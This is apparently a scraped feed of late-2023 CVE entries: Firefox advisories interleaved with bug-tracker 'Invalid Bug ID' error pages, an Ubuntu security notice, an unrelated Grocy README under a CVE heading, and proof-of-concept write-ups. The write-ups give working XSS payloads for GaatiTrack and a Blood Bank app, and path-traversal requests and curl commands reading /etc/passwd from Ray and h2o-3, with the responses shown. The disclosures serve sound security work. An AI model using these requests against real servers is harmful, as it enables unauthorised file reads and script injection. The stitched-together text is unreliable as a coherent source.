An attacker could have accessed internal pages or data by ex-filtrating a security key from ReaderMode via the `referrerpolicy` attribute. This vulnerability affects Firefox for iOS < 120.

Sorry, I can't find "_1861405?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-49060: Invalid Bug ID

On some systems—depending on the graphics settings and drivers—it was possible to force an out-of-bounds read and leak memory data into the images created on the canvas element. This vulnerability affects Firefox < 120, Firefox < 115.5, and Thunderbird < 115.5.0.

Sorry, I can't find "_1841050?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-6204: Invalid Bug ID

It was possible to cause the use of a MessagePort after it had already been freed, which could potentially have led to an exploitable crash. This vulnerability affects Firefox < 120, Firefox < 115.5, and Thunderbird < 115.5.0.

Sorry, I can't find "_1854076?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-6205: Invalid Bug ID

GaatiTrack Courier Management System version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - MultipleCross-site scripting# Date: 12/112023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48206Description:Multiple reflected cross-site scripting (XSS) vulnerability exists inlogin.php, header.php page of GaatiTrack Courier Management System v1.0that allows attackers to execute arbitrary web scripts or HTML via acrafted payload injected into the Website login page parameter.Steps to Reproduce:1. Go to login and capture request data using burp suite. Your request datawill be:GET /gaatitrack/login.php HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mpUpgrade-Insecure-Requests: 12. Now use XSS payload in login.php. So your request data will be:GET/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mpUpgrade-Insecure-Requests: 13. Forward You request data and check browser. You will be popup withdomain.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)

GaatiTrack Courier Management System 1.0 Cross Site Scripting

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

**Description**

Local file include allows remote attackers to make an unauthenticated API call and read any file on the system, such as SSH keys.

**Proof of Concept**

    GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: script
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Etag: "174880dae894b157-2020"
    Last-Modified: Thu, 02 Mar 2023 04:48:59 GMT
    Content-Length: 8224
    Accept-Ranges: bytes
    Date: Thu, 24 Aug 2023 23:01:58 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    
    ##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
    [...]
    

**Impact**

Allows attackers to read any file on the server depending on the permissions Ray was run with.

**Occurrences**

CVE-2023-6020: LFI in Ray API - GET /static/ in ray

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.

**Description**

Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

**Proof of Concept**

Start the h2o-3 API with:

    cd h2o-3.40.0.4
    java -jar h2o.jar
    

Then make these curl requests:

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        $'http://127.0.0.1:54321/3/ImportFiles?path=%2Fetc%2Fpasswd'
    

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin: http://127.0.0.1:54321' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \
        $'http://127.0.0.1:54321/3/ParseSetup'
    

The response:

    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 08 Jun 2023 15:10:27 GMT
    Cache-Control: no-cache
    X-h2o-build-project-version: 3.40.0.4
    X-h2o-rest-api-version-max: 3
    X-h2o-cluster-id: 1686167537026
    X-h2o-cluster-good: true
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
    Content-Type: application/json
    Content-Length: 1457
    
    {"__meta":{"schema_version":3,"schema_name":"ParseSetupV3","schema_type":"ParseSetup"},"_exclude_fields":"","source_frames":[{"__meta":{"schema_version":3,"schema_name":"FrameKeyV3","schema_type":"Key<Frame>"},"name":"nfs://etc/passwd","type":"Key<Frame>","URL":"/3/Frames/nfs://etc/passwd"}],"parse_type":"CSV","separator":32,"single_quotes":false,"check_header":-1,"column_names":null,"skipped_columns":null,"column_types":["String","Enum"],"na_strings":null,"column_name_filter":null,"column_offset":0,"column_count":0,"destination_frame":"passwd.hex","header_lines":0,"number_columns":2,"data":[["nobody:*:-2:-2:Unprivileged","User:/var/empty:/usr/bin/false"],["root:*:0:0:System","Administrator:/var/root:/bin/sh"],["daemon:*:1:1:System","Services:/var/root:/usr/bin/false"],["fakeuser:*:99:99:Fake","User:/Users/danmcinerney/fakeuser:/bin/sh"],["_uucp:*:4:4:Unix","to","Unix","Copy","Protocol:/var/spool/uucp:/usr/sbin/uucico"],["_taskgated:*:13:13:Task","Gate","Daemon:/var/empty:/usr/bin/false"],["_networkd:*:24:24:Network","Services:/var/networkd:/usr/bin/false"],["_installassistant:*:25:25:Install","Assistant:/var/empty:/usr/bin/false"],["_lp:*:26:26:Printing","Services:/var/spool/cups:/usr/bin/false"],["_postfix:*:27:27:Postfix","Mail","Server:/var/spool/postfix:/usr/bin/false"]],"warnings":null,"chunk_size":4194304,"total_filtered_column_count":2,"custom_non_data_line_markers":null,"decrypt_tool":null,"partition_by":null,"escapechar":0}
    

Developers have been contacted 06/08/2023:

    H2O Support
        
    Wed, Jun 7, 4:32 PM (18 hours ago)
        
    to me
    
    Dear Dan McInerney,
    
    We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
    Your ticket id is :  [#105551] 
    
    
    To view the status of the ticket or add comments, please visit
    https://support.h2o.ai/helpdesk/tickets/105551
    
    Your problem description is as below:
    
    The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.
    
    
    
    
    
    Ticket attachments : 1. lfi id rsa.png
    2. Screenshot 2023-06-07 at 4.31.34 PM.png
    
    
    Thank you for your patience.
    
    Sincerely,
    H2O.ai Support Team
    

**Impact**

Remotely accessing every file on the API server with the permissions of the user who ran the command.

**Occurrences**

CVE-2023-6038: LFI in h2o-3 API in h2o-3

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

**Description**

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

**Proof of Concept**

    GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Date: Thu, 24 Aug 2023 21:49:54 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    Content-Length: 8225
    
    1##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    

**Impact**

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

**Occurrences**

CVE-2023-6021: LFI in Ray API in ray

Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.

**Give it a try**

*   Public demo of the latest stable version (release branch) → https://demo.grocy.info
*   Public demo of the current development version (master branch) → https://demo-prerelease.grocy.info

**Features**

See the website → https://grocy.info

**Questions / Help / Bug Reports / Feature Requests**

*   General help and usage questions → r/grocy subreddit
*   Bug Reports and Feature Requests → Issue Tracker

_Please don't send me private messages or call me regarding anything Grocy. I check the issue tracker and the subreddit pretty much daily, but don't provide any support beyond that._

**Community contributions**

See the website for a list of community contributed Add-ons / Tools. → https://grocy.info/addons

**How to install**

> Checkout Grocy Desktop, if you want to run Grocy without having to manage a webserver just like a normal (Windows) desktop application.
> 
> Directly download the latest release - the installation is nothing more than just clicking 2 times "next".

Grocy is technically a pretty simple PHP application, so the basic notes to get it running are:

*   Unpack the latest release
*   Copy config-dist.php to data/config.php + edit to your needs
*   Ensure that the data directory is writable
*   The webserver root should point to the public directory
*   Include try_files $uri /index.php$is_args$query_string; in your location block if you use nginx
    *   Or disable URL rewriting (see the option DISABLE_URL_REWRITING in data/config.php)
*   → Default login is user admin with password admin, please change the password immediately (user menu at the top right corner)

Alternatively clone this repository (the release branch always references the latest released version) and install Composer and Yarn dependencies manually.

See the website for more installation guides and troubleshooting help. → https://grocy.info/links

**Platform support**

*   PHP 8.1 or 8.2 (with SQLite 3.34.0+)
    *   Required PHP extensions: fileinfo, pdo_sqlite, gd, ctype, json, intl, zlib, mbstring
    *   _Recommendation: Benchmark tests showed that e.g. unit conversion handling is up to 5 times faster when using a more recent (3.39.4+) SQLite version._
*   Recent Firefox, Chrome or Edge

**How to run using Docker**

See grocy/grocy-docker or linuxserver/docker-grocy for instructions.

**How to update**

*   Overwrite everything with the latest release while keeping the data directory
*   Check config-dist.php for new configuration options and add them to your data/config.php where appropriate (the default values from config-dist.php will be used for not in data/config.php defined settings)
*   Empty the data/viewcache directory
*   Visit the main route once to apply database migrations (see below)

If you run Grocy on Linux, there is also update.sh (remember to make the script executable (chmod +x update.sh) and ensure that you have unzip installed) which does exactly this and additionally creates a backup (.tgz archive) of the current installation in data/backups (backups older than 60 days will be deleted during the update).

**Localization**

Grocy is fully localizable - the default language is English (integrated into code), a German localization is always maintained by me.

You can easily help translating Grocy on Transifex if your language is incomplete or not available yet.

The default language can be set in data/config.php, e. g. Setting('DEFAULT_LOCALE', 'it'); and there is also a user setting (see the user settings page) to set a different language per user.

The pre-release demo is available for any translation which is at least 70 % complete and will pull the translations from Transifex 10 minutes past every hour, so you can have a kind of instant preview of your contributed translations. Thank you!

Also any translation which once reached a completion level of 70 % (strings resource) will be included in releases.

_RTL languages are unfortunately not yet supported._

**Motivation**

A household needs to be managed. I did this so far (almost 10 years) with my first self written software (a C# Windows forms application) and with a bunch of Excel sheets. The software was a pain to use at the end and Excel is Excel. So I searched for and tried different things for a (very) long time, nothing 100 % fitted, so this is my aim for a "complete household management"-thing. ERP your fridge!

**Things worth to know****REST API**

See the integrated Swagger UI instance on /api.

**Barcode readers & camera scanning**

Some fields (with a barcode icon above) also allow to select a value by scanning a barcode. It works best when your barcode reader prefixes every barcode with a letter which is normally not part of a item name (I use a $) and sends a TAB after a scan.

Additionally it's also possible to use your device camera to scan a barcode by using the camera button on the right side of the corresponding field (powered by Quagga2, totally offline / client-side camera stream processing, please note due to browser security restrictions, this only works when serving Grocy via a secure connection (https://)). Quick video demo: https://www.youtube.com/watch?v=Y5YH6IJFnfc

_My personal recommendation: Use a USB barcode laser scanner. They are cheap and work 1000 % better, faster, under any lighting condition and from any angle._

**Input shorthands for date fields**

For (productivity) reasons all date (and time) input (and display) fields use the ISO-8601 format regardless of localization. The following shorthands are available:

*   MMDD gets expanded to the given day on the current year, if > today, or to the given day next year, if < today, in proper notation
    *   Example: 0517 will be converted to 2023-05-17
*   YYYYMMDD gets expanded to the proper ISO-8601 notation
    *   Example: 20230417 will be converted to 2023-04-17
*   YYYYMMe or YYYYMM+ gets expanded to the end of the given month in the given year in proper notation
    *   Example: 202307e will be converted to 2023-07-31
*   [+/-]n[d/m/y] gets expanded to a date relative to today, while adding (**+**) or subtracting (**\-**) the **n**umber of **d**ays/**m**onths/**y**ears, in proper notation
    *   Example: +1m will be converted to the same day next month
*   x gets expanded to 2999-12-31 (which is an alias for "never overdue")
*   Down/up arrow keys will increase/decrease the date by 1 day
*   Right/left arrow keys will increase/decrease the date by 1 week
*   Shift + down/up arrow keys will increase/decrease the date by 1 month
*   Shift + right/left arrow keys will increase/decrease the date by 1 year

**Keyboard shorthands for buttons**

Wherever a button contains a bold highlighted letter, this is a shortcut key. Example: Button "**P** Add as new product" can be "pressed" by using the P key on your keyboard.

**Barcode lookup via external services**

Products can be directly added to the database via looking them up against external services by a barcode.

This can be done in-place using the product picker workflow "External barcode lookup (via plugin)" (the workflow dialog is displayed when entering something unknown in any product input field).

There is no plugin included for any service, see the reference implementation in data/plugins/DemoBarcodeLookupPlugin.php.

**Database migrations**

Database schema migration is automatically done when visiting the root (/) route (click on the logo in the left upper edge).

_Please note: Database migrations are supposed to work between releases, not between every commit. If you want to run the current master branch (which is the development version), you need to handle that (and maybe more) yourself._

**Disable certain features**

If you don't use certain feature sets of Grocy (for example if you don't need "Chores"), there are feature flags per major feature set to hide/disable the related UI elements (see config-dist.php).

**Adding your own CSS or JS without to have to modify the application itself**

*   When the file data/custom_js.html exists, the contents of the file will be added just before </body> (end of body) on every page
*   When the file data/custom_css.html exists, the contents of the file will be added just before </head> (end of head) on every page

**Demo mode**

When the MODE setting is set to dev, demo or prerelease, the application will work in a demo mode which means authentication is disabled and some demo data will be generated during the database schema migration (pass the query parameter nodemodata, e.g. https://grocy.example.com/?nodemodata to skip that).

**Embedded mode**

When the file embedded.txt exists, it must contain a valid and writable path which will be used as the data directory instead of data and authentication will be disabled (used in Grocy Desktop).

In embedded mode, settings can be overridden by text files in data/settingoverrides, the file name must be <SettingName>.txt (e. g. BASE_URL.txt) and the content must be the setting value (normally one single line).

**Contributing / Say Thanks**

Any help is welcome, feel free to contribute anything which comes to your mind or see https://grocy.info/#say-thanks if you just want to say thanks.

**Roadmap**

There is none, this is a hobby project. The progress of a specific bug/enhancement is always tracked in the corresponding issue, at least by commit comment references.

Milestones are used to indicate in which version the corresponding request was done (vNEXT means it's currently planned to do that for the next release).

**Screenshots****Stock overview**

**Shopping List**

**Meal Plan**

**Chores overview**

**License**

The MIT License (MIT)

CVE-2023-48200: GitHub - grocy/grocy: ERP beyond your fridge - Grocy is a web-based self-hosted groceries & household management solution for your home

Ubuntu Security Notice 6456-2 - USN-6456-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Kelsey Gilbert discovered that Firefox did not properly manage certain browser prompts and dialogs due to an insufficient activation-delay. An attacker could potentially exploit this issue to perform clickjacking. Daniel Veditz discovered that Firefox did not properly validate a cookie containing invalid characters. An attacker could potentially exploit this issue to cause a denial of service. Shaheen Fazim discovered that Firefox did not properly validate the URLs open by installed WebExtension. An attacker could potentially exploit this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6456-2  
November 14, 2023

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

USN-6456-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-6456-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Multiple security issues were discovered in Firefox. If a user were  
 tricked into opening a specially crafted website, an attacker could  
 potentially exploit these to cause a denial of service, obtain sensitive  
 information across domains, or execute arbitrary code. (CVE-2023-5722,  
 CVE-2023-5724, CVE-2023-5728, CVE-2023-5729, CVE-2023-5730, CVE-2023-5731)

  Kelsey Gilbert discovered that Firefox did not properly manage certain  
 browser prompts and dialogs due to an insufficient activation-delay. An  
 attacker could potentially exploit this issue to perform clickjacking.  
 (CVE-2023-5721)

  Daniel Veditz discovered that Firefox did not properly validate a cookie  
 containing invalid characters. An attacker could potentially exploit this  
 issue to cause a denial of service. (CVE-2023-5723)

  Shaheen Fazim discovered that Firefox did not properly validate the URLs  
 open by installed WebExtension. An attacker could potentially exploit this  
 issue to obtain sensitive information. (CVE-2023-5725)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  firefox                         119.0.1+build1-0ubuntu0.20.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6456-2  
  https://ubuntu.com/security/notices/USN-6456-1  
  https://launchpad.net/bugs/2043441

Package Information:  
  https://launchpad.net/ubuntu/+source/firefox/119.0.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6456-2

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

**CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a critical security vulnerability involving Stored Cross-Site Scripting (XSS) through multiple parameters (rename, remail, rphone, and rcity) in the /updateprofile.php file. The application fails to adequately sanitize user-supplied data, allowing attackers to inject malicious scripts into the application. This could lead to the execution of arbitrary script code in the browsers of unsuspecting users, potentially compromising their security and privacy within the context of the affected site.

**Vulnerability Details**

*   CVE ID: CVE-2023-46020
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: updateprofile.php
*   Parameters: rename, remail, rphone, rcity
*   Attack Type: local

**Description**

*   The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

**Proof of Concept (PoC) :**

*   Intercept the POST request to updateprofile.php via Burp Suite
*   Inject the payload to the vulnerable parameters
*   Payload: "><svg/onload=alert(document.domain)>
*   Example request for rname parameter

    POST /bloodbank/file/updateprofile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/rprofile.php?id=1
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
    

*   Go to the profile page and trigger the XSS

Tag

#firefox